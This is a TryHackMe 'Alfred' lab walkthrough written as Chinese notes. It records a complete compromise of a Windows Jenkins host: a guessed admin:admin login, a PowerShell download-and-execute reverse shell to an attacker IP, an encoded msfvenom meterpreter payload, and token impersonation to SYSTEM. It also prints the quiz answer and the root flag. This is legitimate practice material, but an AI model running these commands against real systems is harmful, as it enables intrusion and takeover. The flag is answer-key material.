URL : https://tryhackme.com/room/alfred
IP : 10.10.244.238
Initial access
rustscan -a 10.10.244.238
- 80
- 3389
- 8080
nmap -A -p80,3389,8080 10.10.244.238
- 發現 8080 的 Jenkins 是
- Jetty 9.4.z-SNAPSHOT
- 但找不到相關的 Exploit
- 發現 8080 的 Jenkins 是
- 80 port 首頁
- 看起來沒什麼特別的東西QQ
python3 dirsearch.py -u http://10.10.244.238/
- 掃了之後也沒啥東西
- 8080 port 登入頁面
- 發現會掃出一些404,但沒啥幫助
- 發現會掃出一些404,但沒啥幫助
進入 Jenkins
- 看到官方的 hint 寫
*****:*****
- 直接通靈猜
admin:admin
- 就進去了 ……
- 好無聊= =
- 直接通靈猜
- 透過 Deploy 的 build code 輸入指令
whoami
systeminfo
- 準備 Windows Reverse Shell
- 本機
wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
nc -nvlp 7877
- 靶機
powershell iex (New-Object Net.WebClient).DownloadString('http://10.13.21.55:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.13.21.55 -Port 7877
- 就成功接上了
- 本機
- 取得 uesr flag
- 使用 msfvenom 產 meterperter reverse shell
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.13.21.55 LPORT=7879 -f exe -o meow.exe
- 開啟
msfconsole
準備接收use exploit/multi/handler
set LHOST 10.13.21.55
set LPORT 7879
set PAYLOAD windows/meterpreter/reverse_tcp
show options
確認參數是否正確run
等待接收
- 下載並執行 meterpreter 的 shell
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.13.21.55:8000/meow.exe','meow.exe')"
Start-Process "meow.exe"
- msf 接上了!
- What is the final size of the exe payload that you generated?
- 73802
- meterperter
getuid
- 回傳
Alfred\bruce
- 回傳
load incognito
list_tokens -g
- 發現可以利用
BUILTIN\Administrators
- 發現可以利用
impersonate_token "BUILTIN\Administrators"
- 成功!
- 再次
whoami
- Migrate 到 system
ps
- 準備寄生到
services.exe
- 準備寄生到
migrate 668
- 成功!
- 輸入
shell
cd system
type root.txt
- 取得 root flag
dff0f748678f280250f25a45b8046b4a